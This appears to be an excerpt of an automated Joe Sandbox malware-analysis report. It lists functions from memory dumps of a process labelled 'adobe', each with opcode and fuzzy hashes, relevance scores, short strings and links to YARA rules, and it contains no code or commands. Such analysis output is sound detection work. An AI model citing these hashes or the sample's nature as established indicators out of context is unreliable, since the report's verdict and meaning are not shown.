Opcode ID: 838b0e6ca9eb3c23bad27e4b08270863104b7330d3dea0315a7252bc23229c8f
Instruction ID: 86421dca9d46af24ef4f499442fd6273612e97abbe3f4f876bb3711a5fd0336f
Opcode Fuzzy Hash: 838b0e6ca9eb3c23bad27e4b08270863104b7330d3dea0315a7252bc23229c8f
Instruction Fuzzy Hash: FC313E71F102154BDB54DF7AC8902ADB7E6EB89710F54883AE549F7380DB70DD468790

Function 02FFEDDF Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 02FFEE7F

Memory Dump Source

Source File: 00000007.00000002.1889133415.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2ff0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: cfb5528815dab8480a030ca2620ec970aae5b35117c192ffc66f88cf3a4e8c28
Instruction ID: 51ce4463d5b909d7e67134d833b7d82b340c86574ea3c23fc02347eadcf44da3
Opcode Fuzzy Hash: cfb5528815dab8480a030ca2620ec970aae5b35117c192ffc66f88cf3a4e8c28
Instruction Fuzzy Hash: BC2186B1C006998FCB10CFAAD50479EBBF0AF48220F10816AD958A7260E3389941CFE2

Function 02FFEE18 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 02FFEE7F

Memory Dump Source

Source File: 00000007.00000002.1889133415.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2ff0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 696a9a3fbc9f19c3652af9a0eee87c36c03efdcce1e4336ded449178f591a21e
Instruction ID: 79db05ed8367335145290ca26cdfa5ac5dfe43836fdf3a8a10d017313b22631c
Opcode Fuzzy Hash: 696a9a3fbc9f19c3652af9a0eee87c36c03efdcce1e4336ded449178f591a21e
Instruction Fuzzy Hash: 5E1120B1C006699BCB10CF9AD544BDEFBF4EF48320F15816AD918A7260E378A944CFE5

Function 06D64B13 Relevance: 1.4, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06D64C45

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: XPcq
API String ID: 0-714321711
Opcode ID: 458c0e68162f0ecf11bcd6b3aa0d63a465fcaa1a85973760e04b228c134ffeb6
Instruction ID: 4926282d46474add8f50721964f147c6161ce943bbf5196e1d48b8f8a2711513
Opcode Fuzzy Hash: 458c0e68162f0ecf11bcd6b3aa0d63a465fcaa1a85973760e04b228c134ffeb6
Instruction Fuzzy Hash: 59414C70F102089FDB55DFA9C854BAEBAF6FF88700F208529E105EB395DA748C458B91

Function 06D64B09 Relevance: 1.4, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06D64C45

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: XPcq
API String ID: 0-714321711
Opcode ID: 5c9017eb03ef12cb9b7b33fb2bf5128ad766ddfbb3c7e7adc3dccff3b0e1308b
Instruction ID: f42a0f50c8a2885b1d617b56c5d87fe410de5a820cc8c76a5d596d76904381ed
Opcode Fuzzy Hash: 5c9017eb03ef12cb9b7b33fb2bf5128ad766ddfbb3c7e7adc3dccff3b0e1308b
Instruction Fuzzy Hash: A0414A74F102099FEB55DFA9C8547AEBAF2FF88700F208529E105EB395DB748C458B91

Function 06D6DA50 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 06D6DB99

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 38a094c4330d2af7b830df37dc668ad87086f269016b7ddc2f5483f1b06a1974
Instruction ID: 3778a32fc5e048629fa097a0992850725b003d5faf14ee5b8b29597dc4b5bce6
Opcode Fuzzy Hash: 38a094c4330d2af7b830df37dc668ad87086f269016b7ddc2f5483f1b06a1974
Instruction Fuzzy Hash: CA41A130F142099FDB60DFA6E5446AEBBB2FF85300F144529E406EB244DB74D946CB81

Function 06D6DA4B Relevance: 1.4, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 06D6DB99

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: eaad6063a6ed768b113a5e1313bb372761c0829bec78b6aaede1f2eea5ae82e3
Instruction ID: 5c93274ecb768a460fc6b574651e77d9aef511a67437bd07d1eb5366db66a72b
Opcode Fuzzy Hash: eaad6063a6ed768b113a5e1313bb372761c0829bec78b6aaede1f2eea5ae82e3
Instruction Fuzzy Hash: B6418F70F102099FDB65DFA6E5846AEBBB2FF85300F148529E405EB244EB74E946CB81

Function 06D621B5 Relevance: 1.4, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 06D62303

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 5891a81ca8a1d9741a1a7cd3316f62a7659ff8bdaf55db4ab8e377343d99ebfb
Instruction ID: f9d596d78e805ef8685308635fb62bfac5c4b9593c3fa0f58e2c77c510e7a85f
Opcode Fuzzy Hash: 5891a81ca8a1d9741a1a7cd3316f62a7659ff8bdaf55db4ab8e377343d99ebfb
Instruction Fuzzy Hash: 9E312E30B102028FDB699B75D55826E7BA2BF8A304F148568E006DB395DF39DD46CBA1

Function 06D621C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06D62303

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 3611fa4d4e7375e18d1d1f4cdcedb6863be06f8e3e36b565ded74e62e1460450
Instruction ID: 75b00a1610fc5fdba8f2634ff8a61920e53411d164a71ee63cc96d47986e0d87
Opcode Fuzzy Hash: 3611fa4d4e7375e18d1d1f4cdcedb6863be06f8e3e36b565ded74e62e1460450
Instruction Fuzzy Hash: CD31E230B102018FDB699B75D55866F7BE2AF89700F108428E406DB385DF39DD46CBA5

Function 06D6FEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 06D6FF48

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 8b10ef8d2ebe1a337452b58a4cf6b40be3e49743aca8fffd642e35dec4bc1898
Instruction ID: 79c95c2c20114474f612f318f5aa9fd85e5850eac46595a439ea3d035e1d293c
Opcode Fuzzy Hash: 8b10ef8d2ebe1a337452b58a4cf6b40be3e49743aca8fffd642e35dec4bc1898
Instruction Fuzzy Hash: 22118B70B102209FDB509F79D804B6E7BF2AF88700F008469E50AEB3A0DB799C00CB80

Function 06D6FEF7 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

|, xrefs: 06D6FF48

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 1769ca43fbf80ceee14e5e883b91cff8fb28577d4b6d774fe4907f0d43858726
Instruction ID: f08ddd96a3fe25bc0f1db387500af28698fe0cc02de4e5dc99555085bda0f52d
Opcode Fuzzy Hash: 1769ca43fbf80ceee14e5e883b91cff8fb28577d4b6d774fe4907f0d43858726
Instruction Fuzzy Hash: 1F115B71F102109FDB549FB8D805B6E7BF2AF88700F104469E50AE73A0DB799901CB80

Function 06D67FEB Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D68035

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: f3613d00f206c7701edaea6df6376a715e8c2799160cd1286a5ff16187029e15
Instruction ID: 5c4050b7b8a8a4e02560e2129119a2a702f60480214c6c277ead7b03cc14e951
Opcode Fuzzy Hash: f3613d00f206c7701edaea6df6376a715e8c2799160cd1286a5ff16187029e15
Instruction Fuzzy Hash: 25012836F112189BDF744EA3D9846AB77B9EB80290F040836FD01D7241CA75DD45D3B1

Function 06D65860 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e0b8b73dc84579165a780e48282b72480cb66dcc25aad77f3d7d2b494a09c0
Instruction ID: afa38728fcf44c3b522fc88cd4ac8d8acee5597ddfbc2b5a819faad0e277d88c
Opcode Fuzzy Hash: 31e0b8b73dc84579165a780e48282b72480cb66dcc25aad77f3d7d2b494a09c0
Instruction Fuzzy Hash: 74B1A035F102099BDB14DFB5E8946AE77B6EB84714F208829E806DB344DF74EC86CB81

Function 06D6B1A3 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603ecd88600d1f2a6590b09aa803c75303bd757a64c67af7b7fa9cff217b7f
Instruction ID: f3d1006a662912b0a47fcc6303875bd9abc74ea79f86695e88747a2be9b80b13
Opcode Fuzzy Hash: 89603ecd88600d1f2a6590b09aa803c75303bd757a64c67af7b7fa9cff217b7f
Instruction Fuzzy Hash: BCA15030F101099FEF64DBAAD5947AE77E6EB89310F204826F409E7395CA35DC918B91

Function 06D65857 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f2ae9d0ea14207bea0191d9e78e8332c1f415d7c06641528f025c90685ef6b
Instruction ID: 3d6acb0e9272ce713598854730ae0b86321968cca9a8831b388ea461268e225f
Opcode Fuzzy Hash: a6f2ae9d0ea14207bea0191d9e78e8332c1f415d7c06641528f025c90685ef6b
Instruction Fuzzy Hash: 8A91B275F102059BDB14DFB5D894AAE77B6EF84314F208829E806EB344DB34ED86CB41

Function 06D66158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc32cf3e7d3af553a8185d690144b95b753e614431c9ebd86f933e5d9be1e12
Instruction ID: a92276c40b5f9f1401c4232fdfe0ff93a5f94670be4824c224c27dc1eb9a3906
Opcode Fuzzy Hash: 4dc32cf3e7d3af553a8185d690144b95b753e614431c9ebd86f933e5d9be1e12
Instruction Fuzzy Hash: 4161C071F000114FCB549B7EC89466FBAD7AFC8620B15443AE80EDB365DE6ADD0287C2

Function 06D6425B Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3e2378287a15a483907572bc2f11715571a7f2c3bd1e4d9e9d1871de2ddd63
Instruction ID: 98f7a6fb5babad1e2422aad28148bca5b335d59d3dab06463838666359e764a6
Opcode Fuzzy Hash: 1c3e2378287a15a483907572bc2f11715571a7f2c3bd1e4d9e9d1871de2ddd63
Instruction Fuzzy Hash: 61813D30B102099FDB54DFA9D5547AEB7F2EF89304F108429E40AEB394EB74EC468B91

Function 06D64260 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cf32d1907d785b94250c4984dd2c8e8b3bb4b59bbf9eca31caca47a0807030
Instruction ID: 198e98ee3bb2d3e76122b3d3443deaa557d3ae54f1f44480e4a075fda65f0d6a
Opcode Fuzzy Hash: 57cf32d1907d785b94250c4984dd2c8e8b3bb4b59bbf9eca31caca47a0807030
Instruction Fuzzy Hash: 1A813C30B102099FDB54DFA9D5547AEB7F2AF89304F108429E40ADB395EB74EC868B91

Function 06D6AE90 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca10826a883bcbc9fbe308f91473ae9be947bf8c18cd65fb8ad060fca66bbbc
Instruction ID: be5c7b2e3693eb3eaabb867c3bc948f760ecc5c6a6b5e7688fd5fee69a888d93
Opcode Fuzzy Hash: bca10826a883bcbc9fbe308f91473ae9be947bf8c18cd65fb8ad060fca66bbbc
Instruction Fuzzy Hash: 93716F31F1031A8FDB14DFAAC5546AEB7B2FF85304F108529E409EB354EB75D8868B81

Function 06D6457B Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca747351cc19caf9b8eacc737a683aad42433c47fd2e5e5b2fb630c939e780a5
Instruction ID: 68b77eb99bb694d5719f8dd939d4a22ef28698935cd5aa967a8dd2343616b8f5
Opcode Fuzzy Hash: ca747351cc19caf9b8eacc737a683aad42433c47fd2e5e5b2fb630c939e780a5
Instruction Fuzzy Hash: C3913F34E102198BDF60DF69C890B9DB7B1FF89310F20C599E549AB354EB70AA85CF91

Function 06D64580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fd74bcab3c29d3c0865e8ba51f7fd649d97a4f72060e98c00ddf9eb5b47a38
Instruction ID: d193f220ad3ec464d6345b4840d6a26c3cafc324901ea082edec1798672f3ebd
Opcode Fuzzy Hash: a0fd74bcab3c29d3c0865e8ba51f7fd649d97a4f72060e98c00ddf9eb5b47a38
Instruction Fuzzy Hash: 8F914F34E102198BDF60DF69C890B9DB7B1FF89310F20C599E549AB354EB70AA85CF91

Function 06D64573 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5b0c7cff41913573c2931f96ecd8711bab6266aff3c7d52b81f73a231b96c5
Instruction ID: ed488ae89b4c23ea6391c78a4f36f4fc3451231d7ec6343c7ff518f81f42cb50
Opcode Fuzzy Hash: ab5b0c7cff41913573c2931f96ecd8711bab6266aff3c7d52b81f73a231b96c5
Instruction Fuzzy Hash: C9914E34E102198BDF50DF69C890B9DB7B1FF89300F20C599E549AB394EB70AA85CF91

Function 06D6EEA3 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ac194f69c1b6af046ee687c34ec50ed7cc83c8d59ff805408d42ef142a4711
Instruction ID: 5e4d2a9ef2699f1ebfcd52ac36c2c276a45a81668c611fe7d7c6bbb1c33e56b6
Opcode Fuzzy Hash: 10ac194f69c1b6af046ee687c34ec50ed7cc83c8d59ff805408d42ef142a4711
Instruction Fuzzy Hash: AF711C74A006099FDB54DBAAD990AAEBBF6FF88300F148429E405EB355DB74EC46CB50

Function 06D6EEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d874d4ee16760b1b9d9428eabfb7c75b412fffde013cc74946c1256d8c8b667
Instruction ID: 9ccc530181dbb98658832172f677e2781615b3531b4e3509afd7fe34d275e219
Opcode Fuzzy Hash: 6d874d4ee16760b1b9d9428eabfb7c75b412fffde013cc74946c1256d8c8b667
Instruction Fuzzy Hash: 91711D74A006099FDB54DFAAD990AAEBBF6FF88300F148429E405EB355DB74EC46CB50

Function 06D6FB38 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137efb9662d1b822928fb18f0f9b5890d7e3137435034fcfb52cf0785298ad30
Instruction ID: 23429506a370a034a7a068f2ad9348d03cdc1bb726782a95a34f5bf811f34491
Opcode Fuzzy Hash: 137efb9662d1b822928fb18f0f9b5890d7e3137435034fcfb52cf0785298ad30
Instruction Fuzzy Hash: E951BE31E105059FDB24EBAAF8942ADBBB3FF85315F108869E10AD7250DB359856CB81

Function 06D6F8D9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86045f622eb6f6920f87be36c7d0fac5b9962d4a24c47972e608a85c63c242b8
Instruction ID: ad96869facee9f3c4ee408abff05c6b5a62123f7f225ec41479593435e807b7b
Opcode Fuzzy Hash: 86045f622eb6f6920f87be36c7d0fac5b9962d4a24c47972e608a85c63c242b8
Instruction Fuzzy Hash: 0451D670F202049FEF645B6EE954B6F2A5BDB89314F24482AF00ED73E5C929CCD58792

Function 06D65550 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0443f23235dd8f2fa6fdb893c914f8969c91972b2a7b210efff454949b7d2e89
Instruction ID: bf5c5dadc0d50ffb69c6f765740a858247f4f8663f806d94653733a799d163fa
Opcode Fuzzy Hash: 0443f23235dd8f2fa6fdb893c914f8969c91972b2a7b210efff454949b7d2e89
Instruction Fuzzy Hash: C151A374E142458FDF70CFAAE49477EBBB2EB45310F20886AF55ADB281C635D881CB91

Function 06D6F8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d27522179e50b8bd6229dc92abcd41b7405205889b4fd13a04f67d87ba86820
Instruction ID: 68a925f955c934fccbb7407caa7c8b9ad3c4f2d25856623509d2006eac5192fb
Opcode Fuzzy Hash: 4d27522179e50b8bd6229dc92abcd41b7405205889b4fd13a04f67d87ba86820
Instruction Fuzzy Hash: 6051B370F202049FEF645BAEE95476F265BEB89750F20482AF10ED73A4C929CCD58792

Function 06D6C758 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885a22175634e50dcf824efc85cb775d29cbcff0f903e232fbf2386caeee847e
Instruction ID: 4ec883c644b80dffaeaeeb9b5dbbbeb8019c53feb1f794361ad214361b9189a3
Opcode Fuzzy Hash: 885a22175634e50dcf824efc85cb775d29cbcff0f903e232fbf2386caeee847e
Instruction Fuzzy Hash: 2A518130F102049FCB44EB79D980A9DB7B2FF88354F108929E545AB364DB35EC86CB90

Function 06D653D0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e3d66bb56c8b2e549c9bf7a37014c0e56dfa65345eca43f07dc19d11714d9d
Instruction ID: b257af44157354edc466f651b7fc4f4a12583ecead5cc7251110febd802e0e77
Opcode Fuzzy Hash: f7e3d66bb56c8b2e549c9bf7a37014c0e56dfa65345eca43f07dc19d11714d9d
Instruction Fuzzy Hash: 4C413071E006098BDF70CF9AE8806AFF7F2FB88310F10492AE156D7654D771E8958B90

Function 06D62078 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce0606bf917706994fff099c6a50e0b02c0738d98671f4efbdb750feebb04bd
Instruction ID: c13a0ae6eec50f27e88f1278663df9d406cc08f1b80831999708b4313f94bc81
Opcode Fuzzy Hash: cce0606bf917706994fff099c6a50e0b02c0738d98671f4efbdb750feebb04bd
Instruction Fuzzy Hash: 17317E70E106059FCF59CFA5D89469EB7B2EF89300F148929E806E7740DB35E946CB91

Function 06D62088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3373a579f326260430279c11db17587d1a3899a135056ad6f21dab73e2f62fd
Instruction ID: 27d33b5964853c4d1c08780c9c6b47ee747a0e3dda8ac6c15ff9265bb537517e
Opcode Fuzzy Hash: d3373a579f326260430279c11db17587d1a3899a135056ad6f21dab73e2f62fd
Instruction Fuzzy Hash: 73315C70E102059BCB59CFAAD89469EB7B2FF89300F108929E816E7350DB75ED46CB91

Function 06D63E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fed043b9a2227a6083c399cecd4a8a1262afc8cc81b66dbe716229275f0601b
Instruction ID: 7599e1943efc25ba51d0e5f1ec9b8ca08baaec566b5ffe9616bd881896cb399e
Opcode Fuzzy Hash: 7fed043b9a2227a6083c399cecd4a8a1262afc8cc81b66dbe716229275f0601b
Instruction Fuzzy Hash: 17217A75F112159FDB40CFAAE880AAEBBF5EB48710F10802AE915E7341E734DD418B91

Function 06D63E63 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d28b21f084c64b3170f2ec2a6dabca871f0364f49a7faeeb219a6edbb5a37d
Instruction ID: 6621259ae2e2ba2a184a6ccfe3e9e782248e24aaa5f7148b6bd8be0c931352d9
Opcode Fuzzy Hash: 72d28b21f084c64b3170f2ec2a6dabca871f0364f49a7faeeb219a6edbb5a37d
Instruction Fuzzy Hash: 96215976F112159FDB40CFAAE840AAEBBF5EB48710F10802AF919E7391E734DD418B91

Function 0129D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1887594273.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_129d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229461ac36fd0b12419713f9fe58a6c3c334345d127694acec2ced1db541cc48
Instruction ID: 33eb92883958cce00ba6d7d4cda5e9a3db6f6548d3183c57a5918d6787f4c57c
Opcode Fuzzy Hash: 229461ac36fd0b12419713f9fe58a6c3c334345d127694acec2ced1db541cc48
Instruction Fuzzy Hash: EE212271514208DFDF11DF9CD9C0B26BBA5FB84314F20C56DD9094B256C37BD446DA62

Function 06D6340B Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f633164eabe7806c944f8a835503aaf5d80e748362715f4b09eff7a2e78ec742
Instruction ID: 09e3641b882a9b0c5e6e803e5aca747e14b65b4298272b4e141fb92dd7505f06
Opcode Fuzzy Hash: f633164eabe7806c944f8a835503aaf5d80e748362715f4b09eff7a2e78ec742
Instruction Fuzzy Hash: 0911B171E002289BCF55DF79D8806DEF7B5EB89310F1599AAE406E7300DA32DA85CB91

Function 06D63F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
